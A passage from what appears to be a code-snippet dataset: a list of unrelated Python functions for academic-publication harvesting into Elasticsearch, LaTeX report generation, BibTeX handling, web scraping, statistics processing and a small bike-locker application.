doc[\"harvested_from\"] = \"researcher\"\n\n doc[\"harvested_from_ids\"] = []\n doc[\"harvested_from_label\"] = []\n\n #\n #\n # print(doc[\"authorship\"], doc ['authLastName_s'])\n\n if len(doc[\"authIdHal_s\"]) != len(doc[\"authLastName_s\"]):\n # print (\"elastichal.py : test d'autorat no good\")\n # test sur le nom complet...\n nom = [\n truc\n for truc in doc[\"authLastName_s\"]\n if chercheur[\"lastName\"].lower() in truc.lower()\n ] # pour les récemment mariés qui auraient un nom composé...\n # Après si 'lun des co-auteur porte le même nom...\n if len(nom) > 0:\n nom = nom[0].title()\n try:\n if doc[\"authLastName_s\"].index(nom) == 0: # premier\n doc[\"authorship\"] = [\n {\"authorship\": \"firstAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n elif (\n doc[\"authLastName_s\"].index(nom) == len(doc[\"authLastName_s\"]) - 1\n ): # dernier\n doc[\"authorship\"] = [\n {\"authorship\": \"lastAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n except ValueError:\n doc[\"authorship\"] = []\n else:\n doc[\"authorship\"] = []\n elif chercheur[\"halId_s\"] in doc[\"authIdHal_s\"]:\n if doc[\"authIdHal_s\"].index(chercheur[\"halId_s\"]) == 0:\n doc[\"authorship\"] = [\n {\"authorship\": \"firstAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n elif (\n doc[\"authIdHal_s\"].index(chercheur[\"halId_s\"]) == len(doc[\"authIdHal_s\"]) - 1\n ): # dernier\n doc[\"authorship\"] = [\n {\"authorship\": \"lastAuthor\", \"authIdHal_s\": chercheur[\"halId_s\"]}\n ]\n else:\n doc[\"authorship\"] = []\n else:\n doc[\"authorship\"] = []\n\n doc[\"harvested_from_ids\"].append(chercheur[\"halId_s\"])\n\n # historique d'appartenance du docId\n # pour attribuer les bons docs aux chercheurs\n # harvet_history.append({'docid': doc['docid'], 'from': row['halId_s']})\n #\n # for h in harvet_history:\n # if h['docid'] == doc['docid']:\n # if h['from'] not in doc[\"harvested_from_ids\"]:\n # doc[\"harvested_from_ids\"].append(h['from'])\n\n doc[\"records\"] = []\n\n doc[\"MDS\"] = utils.calculate_mds(doc)\n\n try:\n should_be_open = utils.should_be_open(doc)\n if should_be_open == 1:\n doc[\"should_be_open\"] = True\n if should_be_open == -1:\n doc[\"should_be_open\"] = False\n\n if should_be_open == 1 or should_be_open == 2:\n doc[\"isOaExtra\"] = True\n elif should_be_open == -1:\n doc[\"isOaExtra\"] = False\n except IndexError:\n print(\"publicationDate_tdate error ?\")\n doc[\"Created\"] = datetime.datetime.now().isoformat()\n\n if not init: # récupération de l'existant pour ne pas écraser\n field = \"_id\"\n doc_param = esActions.scope_p(field, doc[\"_id\"])\n\n if not es.indices.exists(\n index=chercheur[\"structSirene\"]\n + \"-\"\n + chercheur[\"labHalId\"]\n + \"-researchers-\"\n + chercheur[\"ldapId\"]\n + \"-documents\"\n ): # -researchers\" + row[\"ldapId\"] + \"-documents\n print(\"exception \", chercheur[\"labHalId\"], chercheur[\"ldapId\"])\n\n res = es.search(\n index=chercheur[\"structSirene\"]\n + \"-\"\n + chercheur[\"labHalId\"]\n + \"-researchers-\"\n + chercheur[\"ldapId\"]\n + \"-documents\",\n body=doc_param,\n ) # -researchers\" + row[\"ldapId\"] + \"-documents\n\n if len(res[\"hits\"][\"hits\"]) > 0:\n doc[\"validated\"] = res[\"hits\"][\"hits\"][0][\"_source\"][\"validated\"]\n if \"authorship\" in res[\"hits\"][\"hits\"][0][\"_source\"]:\n doc[\"authorship\"] = res[\"hits\"][\"hits\"][0][\"_source\"][\"authorship\"]\n\n if (\n res[\"hits\"][\"hits\"][0][\"_source\"][\"modifiedDate_tdate\"]\n != doc[\"modifiedDate_tdate\"]\n ):\n doc[\"records\"].append(\n {\n \"beforeModifiedDate_tdate\": doc[\"modifiedDate_tdate\"],\n \"MDS\": res[\"hits\"][\"hits\"][0][\"_source\"][\"MDS\"],\n }\n )\n\n else:\n doc[\"validated\"] = True\n progress_recorder.set_progress(num, len(docs), description=\"(récolte)\")\n progress_recorder.set_progress(num, len(docs), description=\"(indexation)\")\n helpers.bulk(\n es,\n docs,\n index=chercheur[\"structSirene\"]\n + \"-\"\n + chercheur[\"labHalId\"]\n + \"-researchers-\"\n + chercheur[\"ldapId\"]\n + \"-documents\",\n refresh=\"wait_for\",\n )\n\n return chercheur # au cas où", "def create_book_objects(content):\n library = []\n for book in content:\n library.append(Book(book['Author'], book['Title'], book['Publisher'], book['Shelf'], book['Category'],\n book['Subject']))\n print('Your Library has been loaded.')\n return library", "def bib_scalar(biblio, key):\n return biblio[key][0]", "def build_latex(file_list):\n eingabe=[]\n anhang_count=0\n anhaenge=[]\n anhaenge_file=[]\n for file in file_list:\n x=load_file(file)[1]\n eingabe.append(\"\\section{%s}\" %(x[2]))\n eingabe.append(\"\\subsection{Infos}\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}lX}\")\n eingabe.append(r\"\\textbf{Datum} & %s\\\\\" %(x[0]))\n eingabe.append(r\"\\textbf{Gremium} & %s\\\\\" %(x[1]))\n eingabe.append(r\"\\textbf{Anatrag/Beschluss wurde} & %s\\\\\" %(x[9]))\n x[11]=x[11].replace(\" \",\"\")\n kw=x[11].split(\",\")\n for i in range(0,len(kw)):\n if i==0:\n eingabe.append(r\"\\textbf{Keyword:} & %s\\\\\" %(kw[i]))\n else:\n eingabe.append(r\" & %s\\\\\" %(kw[i]))\n eingabe.append(\"\\end{tabularx}\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}XXX}\")\n eingabe.append(r\"\\textbf{Abstimmungsergebniss:}&&\\\\\")\n eingabe.append(r\"Zustimmung & Ablehnung & Enthaltungen \\\\\")\n eingabe.append(r\"{} & {} & {} \\\\\".format(x[6],x[7],x[8]))\n eingabe.append(\"\\end{tabularx}\")\n eingabe.append(\"\\subsection{Antrags/Beschlusstext}\")\n line_text=len(eingabe)\n eingabe.append(x[3])\n eingabe.append(\"\\subsection{Begründung}\")\n eingabe.append(x[4])\n if x[23]==\"Ja\" and x[24]!=\"\":\n delta=7\n anzahl=int((len(x)-23)/delta)\n if anzahl==1:\n eingabe.append(\"\\subsection{Änderungsantrag}\")\n eingabe.append(\"\\subsubsection*{Vorschlag}\")\n eingabe.append(x[24])\n eingabe.append(\"\\subsubsection*{Begründung}\")\n eingabe.append(x[25]+\"\\\\vspace{1.5ex} \\\\\\\\\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}XXX}\")\n eingabe.append(r\"\\textbf{Abstimmungsergebniss:}&&\\\\\")\n eingabe.append(r\"Zustimmung & Ablehnung & Enthaltungen \\\\\")\n eingabe.append(r\"{} & {} & {} \\\\\".format(x[26],x[27],x[28]))\n eingabe.append(r\"\\multicolumn{2}{@{}l}{\\textbf{Änderungsantrag wurde:}} & %s \\\\\" %(x[29]))\n eingabe.append(\"\\\\end{tabularx}\")\n else:\n eingabe.append(\"\\subsection{Änderungsanträge}\")\n for i in range(0,anzahl):\n eingabe.append(\"\\subsubsection{Änderungsvorschlag %s}\" %(i+1))\n eingabe.append(\"\\\\paragraph*{Vorschlag}\")\n eingabe.append(x[24+(delta*i)])\n eingabe.append(\"\\\\paragraph*{Begründung}\")\n eingabe.append(x[25+(delta*i)]+\"\\\\vspace{1.5ex} \\\\\\\\\")\n eingabe.append(\"\\\\begin{tabularx}{\\linewidth}{@{}XXX}\")\n eingabe.append(r\"\\textbf{Abstimmungsergebniss:}&&\\\\\")\n eingabe.append(r\"Zustimmung & Ablehnung & Enthaltungen \\\\\")\n eingabe.append(r\"{} & {} & {} \\\\\".format(x[26+(delta*i)],x[27+(delta*i)],x[28+(delta*i)]))\n eingabe.append(r\"\\multicolumn{2}{@{}l}{\\textbf{Änderungsantrag wurde:}} & %s \\\\\" %(x[29+(delta*i)]))\n eingabe.append(\"\\\\end{tabularx}\")\n if x[10]!=\"\":\n anhang=x[10].split(\",\")\n bennenung=x[11].split(\",\")\n eingabe[line_text]=eingabe[line_text]+\"\\\\\\\\ \\n Dieser Antrag enthält %s Anhänge: \" %(len(anhang))\n for i in range(0,len(anhang)):\n anhang_count=anhang_count+1\n anhaenge.append(\"\\section{%s - %s} \\label{An:%s}\" % (x[2],bennenung[i],str(anhang_count)))\n anhaenge.append(\"\\includepdf[pages=-]{%s}\" %(anhang[i]))\n anhaenge_file.append(anhang[i])\n if i!=len(anhang)-1:\n eingabe[line_text]=eingabe[line_text]+\"\\\\nameref{An:%s}, \" % (str(anhang_count))\n else:\n eingabe[line_text]=eingabe[line_text]+\"\\\\nameref{An:%s} \" % (str(anhang_count)) \n \n eingabe.append(\"\\\\newpage\") \n eingabe.append(\"\\\\appendix\") \n eingabe.append(\"\\\\pagenumbering{Roman}\") \n ausgabe=\"\"\n for i in range(0,len(eingabe)):\n ausgabe=ausgabe+eingabe[i]+\"\\n\"\n \n for i in range(0,len(anhaenge)):\n ausgabe=ausgabe+anhaenge[i]+\"\\n\"\n \n return ausgabe,anhaenge_file", "def test_init_bibdesk(bib_bibdesk):\n bd_bib = Bibliography(bib_bibdesk, creator='BibDesk')\n\n # Assert it is all there, especially the appendix\n assert bd_bib.file\n assert bd_bib.data\n assert bd_bib.appdx\n assert bd_bib.appdx.startswith('@comment{BibDesk')", "def load_references(self, collections, item):", "def list(full, field):\n\n short = not full \n\n libraries = select(l for l in Library if l)[:]\n libraries = natsorted(libraries, key=lambda x : attrgetter('name')(x).lower())\n\n if len(libraries) == 0:\n logger.info(\"[!] No libraries available to list.\") \n logger.info(\" Consider run the following command:\")\n logger.info(\" $ apkg init\")\n return \n\n\n\n orderFields = [ \n #, \"library\"\n #, \"sha\"\n \"description\"\n # , \"license\"\n # , \"include\"\n # , \"depend\"\n # , \"testedWith\"\n , \"keywords\"\n # , \"installed\"\n # , \"cached\"\n # , \"fromIndex\"\n # , \"fromUrl\"\n # , \"fromGit\"\n , \"origin\"\n # , \"default\"\n ]\n\n i = 0\n if short and field == \"\":\n logger.info(\"{:<20.20} {:<15.20} {:.72}\"\n .format(\"Library name\", \"Latest version\", \"URL\"))\n logger.info(\"-\"*105)\n\n for library in libraries:\n v = library.getLatestVersion() \n if v is not None:\n if not short:\n\n logger.info(v.library.name)\n logger.info(\"=\"*len(v.library.name))\n\n info = v.info\n\n for k in orderFields: \n val = info.get(k, None)\n if val is not None or val != \"\" or len(val) > 0:\n click.echo(\"{0}: {1}\".format(k,val))\n\n vs = ','.join(str(ver) for ver in v.library.versions)\n \n if len(vs) > 0:\n print(\"Versions:\", vs)\n \n else:\n if field in listFields:\n if field == \"name\":\n print(v.library.name)\n elif field == \"version\":\n print(v.name)\n else:\n print(v.library.url)\n else:\n print(\"{:<20.20} {:<15.20} {:.72}\"\n .format(v.library.name,v.name,v.library.url))\n\n i += 1\n if not short and i < len(libraries):\n logger.info(\"\")", "def generarConsultasLibres(self): \n \n for idw,word in enumerate(self.key_words):\n consultasparql = self.busLibre % (word,self.limit_BL)\n self.ConsultasLibres.append(consultasparql)\n \n \n return self.ConsultasLibres", "def getJar(oldDatas,jarList):\n #clear pastebin here. confirmed.\n if pastebin in os.listdir():\n tempdir = barrand6()\n os.rename(pastebin,tempdir)#clever..fine..\n shutil.rmtree(tempdir)#acces deniyed ..fixed!\n os.mkdir(pastebin)\n\n\n oldDatakeys = oldDatas.keys()\n newDatas = {} #for data insure.\n\n for noFolder in jarList:\n try:\n #txtFiledir = os.path.join( origins,noFolder,noFolder+'.txt')\n txtFilename = noFolder+'.txt'\n #------------------------user pre-sure.\n txtfiles = []\n for f in os.listdir( os.path.join( jar,noFolder) ):\n if '.txt' in f:\n txtfiles.append(f)\n if len(txtfiles) == 1:\n txtFilename = txtfiles[0]\n else:\n if not '설정.txt' in txtfiles:\n raise Exception('ERROR no txt : ' + str(noFolder))\n txtFilename = '설정.txt'\n #------------------------user pre-sure\n\n txtFile = os.path.join( jar,noFolder,txtFilename) #whatif dir = no.txt?\n parsedDict = txt2dict.parseTxt(txtFile,parseKeys,multiLineKey)#hope it's atleast complete...\n\n #----------------------for custom dict additional option\n checklist = ['번호','제목','작성자','날짜','본문']\n for c in checklist:\n if not c in parsedDict.keys():\n raise Exception('ERROR!! not format txt : ' + str(noFolder))\n\n #user input, do another func.\n #'16'.isdigit()\n #if int(parsedDict['번호'])<1:\n #raise Exception('ERROR!! of : ' + str(noFolder))\n #a = parsedDict['날짜'].split('.')\n #b = str(datetime.date.today()).split('-')\n #if datetime.date(a[0],a[1],a[2]) < datetime.date.today()\n\n if '태그' in parsedDict.keys():\n tagList = parsedDict['태그'].split(',')\n parsedDict['유저태그'] = tagList\n del parsedDict['태그']\n else:\n parsedDict['유저태그'] = []\n\n if parsedDict['제목'].startswith('[번역]'):\n parsedDict['제목'] = parsedDict['제목'].split('[번역]')[1].strip()\n if parsedDict['제목'].find('센세)') != -1 :\n parsedDict['유저태그'].append( parsedDict['제목'].split('센세)')[0].strip()+'센세' )\n #parsedDict['태그'].append( a.split('[번역]')[1].strip().split('센세)')[0]+'센세)' )\n #----------------------for custom dict additional option\n\n\n #----------------------------- after get parsedDict.\n tmpKey = parsedDict[idKey] #9133114\n if tmpKey in oldDatakeys:\n raise Exception('skip.. id already in parsedict ..: ' + str(noFolder))\n\n idFoldername = parsedDict['번호']\n noFolderpath = os.path.join( jar,noFolder )\n originPath = os.path.join( origins , idFoldername )\n shutil.copytree(noFolderpath,originPath, dirs_exist_ok = False)# was true, but to integrity....\n #it occured at test. nodict, but files.\n #shutil.move(noFolderpath,pastebin)\n\n\n #datas is dict object, appended new key,value.\n #add more value.\n #datas[tmpKey]['key'] = 'value'\n\n # get moved nofolder, add datas originImgs.\n originFiles = os.listdir(os.path.join( origins, idFoldername))\n originImgs = []\n for img in originFiles:\n ext = os.path.splitext( img )[1][1:] # .jpg == jpg\n if ext in imgExt: #now, it's img.\n originImgs.append(img)\n if originImgs==[]:\n raise Exception('ERROR!! no img..: ' + str(noFolder))\n parsedDict[originKey] = originImgs\n\n newDatas[tmpKey] = parsedDict\n #datas[tmpKey][allfilesKey] = originFiles\n thisrand=barrand6()\n os.rename( os.path.join( jar,noFolder), pastebin+'/'+noFolder+thisrand )\n\n except Exception as e:\n exc_info = sys.exc_info()#below except.\n errmsg = exc_info[1],':at line',exc_info[2].tb_lineno\n print(errmsg)\n\n thisrand=barrand6()\n os.rename( os.path.join( jar,noFolder), pastebin+'/'+noFolder+thisrand )\n f = open('./'+pastebin+'/'+noFolder+thisrand+'/err.txt','w',encoding='utf-8')\n f.write(str(errmsg))\n f.close()\n print( 'ERROR occured. gone pastebin :',str(noFolder)+thisrand)\n continue\n\n return newDatas", "def merge_docs(self):", "def globes(self, code):\n return {\n 'ariel': 'http://www.wikidata.org/entity/Q3343',\n 'bennu': 'http://www.wikidata.org/entity/Q11558',\n 'callisto': 'http://www.wikidata.org/entity/Q3134',\n 'ceres': 'http://www.wikidata.org/entity/Q596',\n 'deimos': 'http://www.wikidata.org/entity/Q7548',\n 'dione': 'http://www.wikidata.org/entity/Q15040',\n 'earth': 'http://www.wikidata.org/entity/Q2',\n 'enceladus': 'http://www.wikidata.org/entity/Q3303',\n 'eros': 'http://www.wikidata.org/entity/Q16711',\n 'europa': 'http://www.wikidata.org/entity/Q3143',\n 'ganymede': 'http://www.wikidata.org/entity/Q3169',\n 'gaspra': 'http://www.wikidata.org/entity/Q158244',\n 'hyperion': 'http://www.wikidata.org/entity/Q15037',\n 'iapetus': 'http://www.wikidata.org/entity/Q17958',\n 'io': 'http://www.wikidata.org/entity/Q3123',\n 'jupiter': 'http://www.wikidata.org/entity/Q319',\n 'lutetia': 'http://www.wikidata.org/entity/Q107556',\n 'mars': 'http://www.wikidata.org/entity/Q111',\n 'mercury': 'http://www.wikidata.org/entity/Q308',\n 'mimas': 'http://www.wikidata.org/entity/Q15034',\n 'miranda': 'http://www.wikidata.org/entity/Q3352',\n 'moon': 'http://www.wikidata.org/entity/Q405',\n 'oberon': 'http://www.wikidata.org/entity/Q3332',\n 'phobos': 'http://www.wikidata.org/entity/Q7547',\n 'phoebe': 'http://www.wikidata.org/entity/Q17975',\n 'pluto': 'http://www.wikidata.org/entity/Q339',\n 'rhea': 'http://www.wikidata.org/entity/Q15050',\n 'ryugu': 'http://www.wikidata.org/entity/Q1385178',\n 'steins': 'http://www.wikidata.org/entity/Q150249',\n 'tethys': 'http://www.wikidata.org/entity/Q15047',\n 'titan': 'http://www.wikidata.org/entity/Q2565',\n 'titania': 'http://www.wikidata.org/entity/Q3322',\n 'triton': 'http://www.wikidata.org/entity/Q3359',\n 'umbriel': 'http://www.wikidata.org/entity/Q3338',\n 'venus': 'http://www.wikidata.org/entity/Q313',\n 'vesta': 'http://www.wikidata.org/entity/Q3030',\n }", "def turysci(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"ST.INT.ARVL\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", "def __bol(soup):\n news = []\n anchors = soup.find('ul', class_='maisclicadas').find_all('a')\n\n for a in anchors:\n title = a.span.string.next\n link = a['href']\n news.append(dict(title=title, link=link))\n return news", "def get_dic_codebook(code_book, graphlets, create_graphlet_images=False):\n dictionary_codebook = dict(zip(code_book, graphlets))\n\n # dictionary_codebook = {}\n # for hash, graph in zip(code_book, graphlets):\n # dictionary_codebook[g_name] = graph\n if create_graphlet_images:\n image_path = '/home/' + getpass.getuser() + '/Dropbox/Programming/topics_to_language/LDAvis_images'\n create_codebook_images(dictionary_codebook, image_path)\n return dictionary_codebook", "def get_dic_codebook(code_book, graphlets, create_graphlet_images=False):\n dictionary_codebook = dict(zip(code_book, graphlets))\n\n # dictionary_codebook = {}\n # for hash, graph in zip(code_book, graphlets):\n # dictionary_codebook[g_name] = graph\n if create_graphlet_images:\n image_path = '/home/' + getpass.getuser() + '/Dropbox/Programming/topics_to_language/LDAvis_images'\n create_codebook_images(dictionary_codebook, image_path)\n return dictionary_codebook", "def __local_ba(soup):\n news = []\n ns = get_ns('localBA')\n\n anchors = soup.find('aside', id='conteudos').find_all('a')\n\n for a in anchors:\n title = a.string\n link = ns.url + a['href']\n news.append(dict(title=title, link=link))\n return news", "def kluisVrijgeven():\r\n kluisDict = dictionary()\r\n beginSchermTopTitel['text'] = ''\r\n beginSchermTerug.grid(pady=3, padx=(10, 10), sticky='w', row=1)\r\n\r\n with open('FietsStalling.txt', 'r+') as readFile:\r\n for kluis in kluisDict:\r\n try:\r\n if kluisDict[kluis] is not None and int(beginSchermEntry.get()) in kluisDict[kluis]: # kluis zoeken\r\n # in dictionary\r\n kluisDict[kluis] = None\r\n beginSchermTitel['text'] = 'Kluis nummer ' + str(kluis) + ' is vrijgegeven'\r\n readFile.truncate(0)\r\n readFile.seek(0)\r\n for item in kluisDict: # bestand updaten (vrijgegeven kluis verwijderen)\r\n if kluisDict[item] is not None:\r\n readFile.write(str(item) + '; ' + ''.join(str(kluisDict[item])).strip('{}()\\'\\'')\r\n .replace('\\'', '') + '\\n') # bezette kluizen naar bestand schrijven\r\n beginSchermEntry.delete(0, END)\r\n return\r\n except ValueError:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return\r\n beginSchermTitel['text'] = 'Dit OV nummer is onbekend'\r\n return", "def ingredient_db():\n # type: () -> List[Text]\n return [\"abricot\",\n \"banane\",\n \"cassis\",\n \"cerise\",\n \"citron\",\n \"clémentine\",\n \"coing\",\n \"fraise\",\n \"framboise\",\n \"groseille\",\n \"mirabelle\",\n \"mûre\",\n \"myrtille\",\n \"nectarine\",\n \"orange\",\n \"pamplemousse\",\n \"pomelo\",\n \"pêche\",\n \"poire\",\n \"pomme\",\n \"prune\",\n \"pruneau\",\n \"raisin\",\n \"rhubarbe\",\n \"ananas\",\n \"figue\",\n \"fruit de la passion\",\n \"goyave\",\n \"grenade\",\n \"kaki\",\n \"kiwi\",\n \"kumquat\",\n \"litchi\",\n \"mangue\",\n \"melon\",\n \"papaye\",\n \"pastèque\",\n \"vanille\",\n \"amande\",\n \"datte\",\n \"noisette\",\n \"artichaut\",\n \"aubergine\",\n \"asperge\",\n \"avocat\",\n \"betterave\",\n \"blette\",\n \"brocoli\",\n \"banane plantain\",\n \"carotte\",\n \"cardon\",\n \"céleri rave\",\n \"céleri branche\",\n \"champignon\",\n \"champignon de paris\",\n \"chou blanc\",\n \"chou rouge\",\n \"chou de bruxelles\",\n \"chou-fleur\",\n \"citrouille\",\n \"concombre\",\n \"courge\",\n \"courgette\",\n \"crosne\",\n \"echalote\",\n \"epinard\",\n \"endive\",\n \"fenouil\",\n \"haricot vert\",\n \"haricot\",\n \"navet\",\n \"oignon\",\n \"oseille\",\n \"panais\",\n \"pâtisson\",\n \"petit pois\",\n \"poireau\",\n \"poivron\",\n \"potiron\",\n \"radis rouge\",\n \"rutabaga\",\n \"navet\",\n \"salade \",\n \"salsifis\",\n \"tomate\",\n \"topinambour\",\n \"maïs\"]", "def foto_like():\r\n fotky = []\r\n for i in xrange(1,100000):\r\n try:\r\n pg = urllib2.urlopen(base + '%s'%i).read()\r\n print i\r\n except:\r\n break\r\n soup = BeautifulSoup(pg)\r\n fotos = soup.find_all('div', 'copy')\r\n if not len(fotos):\r\n break\r\n for foto in fotos:\r\n for sibling in foto.next_siblings:\r\n if isinstance(sibling, Tag) and sibling.name=='a':\r\n notes = sibling.find_all('div', 'notes')[0].text.strip()\r\n try:\r\n pocet = int(notes.rsplit(' ', 1)[0].replace(' ','')) \r\n except ValueError:\r\n # print '???', notes\r\n pocet = 0\r\n fotky.append((sibling['href'], pocet, notes, len(notes)))\r\n # 2,3: pro kontrolu správnosti celý text (notes) a jeho délka \r\n print 'stránek :', i-1\r\n print 'fotek :', len(fotky)\r\n return fotky", "def af_list(self) -> List:\n ...", "def make_bib(bib_name, new_bib_name):\n print(\"Saving new Bib File..\")\n \"\"\"read in bibtex file\"\"\"\n print(\"Reading BibTex File: {}\".format(bib_name))\n curdir = osp.abspath('.')\n bib_path = osp.join(curdir, bib_name)\n save_path = osp.join(curdir, new_bib_name)\n with open(bib_path, 'r') as f:\n with open(save_path, 'a') as f_new:\n line = f.readline()\n f_new.write(line)\n filename=None\n while line:\n if line.find('@')==1: # reading entry\n filename = get_name(line)\n if line.find('title')==1:\n link = get_link(line)\n new_link = osp.join('library', filename+'.pdf')\n new_title = get_title(line)\n new_title = '{'+new_title+'}'\n new_link = '\\href{run:'+new_link+'}'\n new_title = new_link+new_title\n new_title = '\\ttitle={}'.format('{'+new_title+'},\\n')\n if link is not None:\n line = new_title\n f_new.write(line)\n line = f.readline()\n print(\"Saved {}\".format(new_bib_name))", "def __init__(self, kegg_brite, obj_level_url_fmt=None,\n path_level_url_fmt=None, org_prefix=None):\n\n self.org_prefix = org_prefix\n self.namespace = None\n self.index2terms = []\n self.term2type = {}\n self.terms = {}\n self.term2parent = self._load_brite(kegg_brite)\n self.obj_level_url_fmt = obj_level_url_fmt\n self.path_level_url_fmt = path_level_url_fmt\n self.term2index = \\\n dict((t, i) for i, t in enumerate(self.index2terms))", "def some_docs(a_dir_path, test_mode=False):\n\ttry:\n\t\tbibfiles = [path.join(a_dir_path,fi) for fi in listdir(a_dir_path)]\n\texcept:\n\t\twarn(\"le dossier %s n'existe pas\" % a_dir_path)\n\t\texit(1)\n\n\tif test_mode:\n\t\t# pour les tests (on fait 3 docs différents à chaque fois)\n\t\tshuffle(bibfiles)\n\t\tthe_files = bibfiles[0:3]\n\n\t\twarn(\"= + = + = + = + = + = + = + = + = + = + = + = + = + = + = + = + = + = + =\")\n\t\twarn(\"TEST_FILES %s\" % the_files)\n\telse:\n\t\tthe_files = bibfiles\n\n\treturn the_files", "def intercambiar(mapa, mapa2):\n for e in mapa.bloqueadas:\n mapa2.bloqueadas.append(e)", "def index_gcis(gcis_url, es_url, index, alias, dump_dir):\n conn = get_es_conn(es_url, index, alias)\n refList = get_refList(dump_dir)\n art_path = \"%s/article/\"%(dump_dir)\n for (root,dirs,files) in os.walk(art_path):\n for f in files:\n f = \"%s%s\"%(art_path, f)\n print(\"f: %s\" % f)\n with open(f) as item:\n article = json.load(item)\n prov = get_doc_prov(article, gcis_url, refList)\n print(\"prov: %s\" % json.dumps(prov, indent=2))\n import_prov(conn, index, alias, prov)", "def kluisOpenen():\r\n kluisDict = dictionary()\r\n beginSchermTopTitel['text'] = ''\r\n beginSchermTerug.grid(pady=3, padx=(10, 10), sticky='w', row=1)\r\n\r\n for kluis in kluisDict:\r\n try:\r\n if kluisDict[kluis] is not None and int(beginSchermEntry.get()) in kluisDict[kluis]: # kluis zoeken in\r\n # dictionary\r\n beginSchermTitel['text'] = 'Kluis nummer ' + str(kluis) + ' is geopend'\r\n beginSchermEntry.delete(0, END)\r\n return\r\n except ValueError:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return\r\n beginSchermTitel['text'] = 'Dit OV nummer is onbekend'\r\n return", "def sprawdz(lista):\n # do_usuniecia - lista zawierajaca indeksy pol ktore zostana usuniete z glownej listy\n do_usuniecia = []\n # petla przechodzaca po wartosciach\n for i in range(len(lista) / 2):\n # j - indeks wartosci dla poszczgolnego panstwa\n j = 2 * i + 1\n # k - indeks pod ktorym nie ma wartosci\n k = 0\n # sprawdzanie ktore elementy sa bez wartosci oraz dodawanie ich do listy do usuniecia\n for el in lista[j]:\n if el is None:\n # zastosowanie unikalnosci indeksow\n if not k in do_usuniecia:\n do_usuniecia.append(k)\n\n k += 1\n # sortowanie listy z indeksami do usuniecia w sposob rosnacy\n do_usuniecia.sort()\n # nowalista - lista zawierajaca statystyki dostepne dla wszystkich panstw odpowiednio [Lata],[Wartosc]\n nowalista = []\n for i in range(len(lista)):\n # wartosc - lista zawierajaca poszczegolne dane z glownej listy\n wartosc = []\n # dodawanie wartosci, ktore sa dostepne dla wszystkich panstw do tabeli wartosc\n for j in range(len(lista[i])):\n # zastosowanie unikalnosci indeksow dla ktorych nie ma wartosci\n if not j in do_usuniecia:\n wartosc.append(lista[i][j])\n # dodawanie listy zawierajacej wynik dla poszczegolnych danych\n nowalista.append(wartosc)\n\n return nowalista", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def documento():\r\n\tpass", "def kluisAanvragen():\r\n kluisDict = dictionary()\r\n beginSchermTopTitel['text'] = ''\r\n beginSchermTerug.grid(pady=3, padx=(10, 10), sticky='w', row=1)\r\n\r\n try:\r\n if len(beginSchermEntry.get()) == 16:\r\n for getal in kluisDict:\r\n if kluisDict[getal] is not None and kluisDict[getal][1] == int(beginSchermEntry.get()):\r\n beginSchermTitel['text'] = 'Je hebt al een kluis: nummer ' + str(getal)\r\n return\r\n\r\n with open('FietsStalling.txt', 'r+') as readFile:\r\n for kluis in kluisDict:\r\n if kluisDict[kluis] is None: # kluis toewijzen\r\n beginSchermTitel['text'] = 'Kluis nummer ' + str(kluis)\r\n kluisDict[kluis] = (time.strftime('%d-%m-%Y %H:%M'),\r\n int(beginSchermEntry.get())) # value wordt tijd en OV\r\n readFile.truncate(0)\r\n readFile.seek(0)\r\n for item in kluisDict: # bestand updaten (nieuwe kluis toevoegen)\r\n if kluisDict[item] is not None:\r\n readFile.write(str(item) + '; ' + ''.join(str(kluisDict[item])).strip('{}()\\'\\'')\r\n .replace('\\'', '') + '\\n')\r\n beginSchermEntry.delete(0, END)\r\n return\r\n beginSchermTitel['text'] = 'Geen kluizen vrij'\r\n return\r\n else:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return\r\n except ValueError:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def read_documents(file_path: str) -> List[Tuple[str, List[Tuple[str, List[str]]]]]:\n print(f'Reading SciREX documents from {file_path}')\n with open(file_path, 'r') as json_file:\n json_list = list(json_file)\n\n papers = []\n for json_str in json_list:\n papers.append(json.loads(json_str))\n\n def find_index_in_array(index, array):\n for array_index, (start, end) in enumerate(array):\n if end > index:\n return array_index\n\n result = []\n for paper in papers:\n result_sections = []\n\n # Populate the sentences list with section information.\n for index, section in enumerate(paper['sections']):\n # Get the first sentence of the section.\n index = find_index_in_array(section[0], paper['sentences'])\n sentence = paper['sentences'][index]\n # The section name is the first sentence of the section.\n section_name = paper['words'][sentence[0]:sentence[1]]\n\n # Example for the first sentence on a section:\n # [\"section\", \":\", \"Abstract\"]\n # If the first sentence starts with [\"section\", \":\"], we are only interested in the words after that prefix.\n if len(section_name) >= 2 and section_name[1] == \":\":\n section_name_length = len(section_name)\n section_name = section_name[2:]\n else:\n section_name_length = 0\n if index == 0:\n # First section will always be labled as 'Title'\n section_name = ['Title']\n else:\n section_name = []\n\n result_sections.append((\" \".join(section_name), []))\n\n words = paper['words']\n for info in paper['sentences']:\n sentence = words[info[0]:info[1]]\n section_index = find_index_in_array(info[0], paper['sections'])\n\n result_sections[section_index][1].append(\" \".join(sentence))\n\n result.append((str(paper['doc_id']), result_sections))\n\n return result", "def __init__(self):\n self.liste = []", "def initialize_children(self, bibs):\n\t\tpass", "def 